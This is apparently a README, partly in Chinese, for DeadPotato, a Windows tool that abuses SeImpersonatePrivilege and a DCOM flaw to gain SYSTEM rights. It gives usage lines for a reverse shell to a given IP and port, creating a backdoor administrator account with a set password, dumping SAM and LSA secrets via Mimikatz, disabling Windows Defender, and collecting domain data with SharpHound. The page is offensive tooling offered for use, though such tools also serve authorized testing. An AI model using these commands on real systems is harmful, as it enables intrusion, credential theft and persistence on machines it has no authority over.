C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
您的上下文中啟用了SeImpersonatePrivilege
權限嗎?使用DeadPotato ,可以在本機系統上獲得最大權限。
該工具將嘗試透過濫用 DCOM 在處理 OXID 時的 RPCSS 缺陷來啟動在NT AUTHORITYSYSTEM
用戶上下文中運行的提升進程,從而允許對電腦進行不受限制的存取以自由執行關鍵操作。-cmd
模組。許多模組可供使用,例如用於生成提升的反向 shell 的-rev IP:PORT
、用於建立新的本機管理員使用者以實現持久性的-newadmin usr:pass
或用於轉儲SAM 雜湊值的-mimi sam
。
為了使用 DeadPotato,必須在目前上下文中啟用 SeImpersonatePrivilege 權限。為了驗證這一點,可以執行whoami /priv
指令。如果停用了權限,則在目前上下文中不可能利用該權限。
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
「DeadPotato」這個計畫是一個基於北辰夢的傑作「GodPotato」原始碼所建構的工具。如果您喜歡這個項目,請務必也去支援原始項目
BeichenDream,Benjamin DELPY gentilkiwi
,BloodHound 開發者。
該專案根據 Apache 2.0 許可證獲得許可。請查看許可證文件以了解更多詳細資訊。